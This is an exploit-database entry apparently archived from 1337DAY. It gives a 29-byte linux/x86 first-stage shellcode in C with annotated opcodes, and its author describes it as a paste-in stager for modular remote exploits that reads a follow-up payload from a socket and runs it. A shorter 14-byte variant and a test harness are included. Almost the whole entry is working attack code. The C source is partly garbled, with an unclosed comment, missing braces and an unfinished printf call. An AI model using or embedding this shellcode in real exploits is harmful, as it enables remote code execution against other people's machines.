linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes

ID 1337DAY-ID-7132
Type zdt
Reporter Charles Stevenson
Modified 2005-11-09T00:00:00


Exploit for linux/x86 platform in category shellcode

linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes

/* h3ll-core.c by Charles Stevenson <[email protected]> 
 * I made this as a chunk you can paste in to make modular remote
 * exploits.  I use it as a first stage payload when I desire to
 * follow up with a real large payload of goodness.  This actually
 * is a bit larger than necessary because of the error checking but
 * in some cases prooves nice.  For a tiny version of the same theme
 * check out mcb's 14 byte (saving of 15 bytes for all you
 * mathematician's out there ;).  The only problem might be that his
 * reads from stdin and can only reads 385 bytes less than mine.  So
 * If you like to go big on the shellcode use mine... otherwise here's
 * mcb's (or comment out the delimited lines below to shrink mine):
 * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
 * I assume the file descriptor is in %esi.  Since that's where it
 * was on the last exploit I wrote.  Change the instruction to
 * the appropriate register from your fndsckcode or put an int in
 * there for and fd that's always the same.
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
//  uncomment the following line to raise SIGTRAP in gdb
// "\xcc"                    // int3
//  22 bytes:
//  if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb"                  // xor    %ebx,%ebx
"\xf7\xe3"                  // mul    %ebx
"\x42"                      // inc    %edx
"\xc1\xe2\x09"              // shl    $0x9,%edx
"\x31\xf3"                  // xor    %esi,%ebx // (optional assumes fd in esi)
"\x04\x03"                  // add    $0x3,%al
"\x54"                      // push   %esp
"\x59"                      // pop    %ecx
"\xcd\x80"                  // int    $0x80
"\x3c\x02"                  // cmp    $0x02,%al // (optional error check) 
"\x7e\x02"                  // jle    exit      // (optional exit clean) 
"\xff\xe1"                  // jmp    *%ecx
//  7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0"                  // xor    %eax,%eax
"\x40"                      // inc    %eax
"\x89\xc3"                  // mov    %eax,%ebx
"\xcd\x80"                  // int    $0x80

int main(void)
  void (*shell)() = (void *)&hellcode;
  printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
  return 0;

# [2018-01-04]  #